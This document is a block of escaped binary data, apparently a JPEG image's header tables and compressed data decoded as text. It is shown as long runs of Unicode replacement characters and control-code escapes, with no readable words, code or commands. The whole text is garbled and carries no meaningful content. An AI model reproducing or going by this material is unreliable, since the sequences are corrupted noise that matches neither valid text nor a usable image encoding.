\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\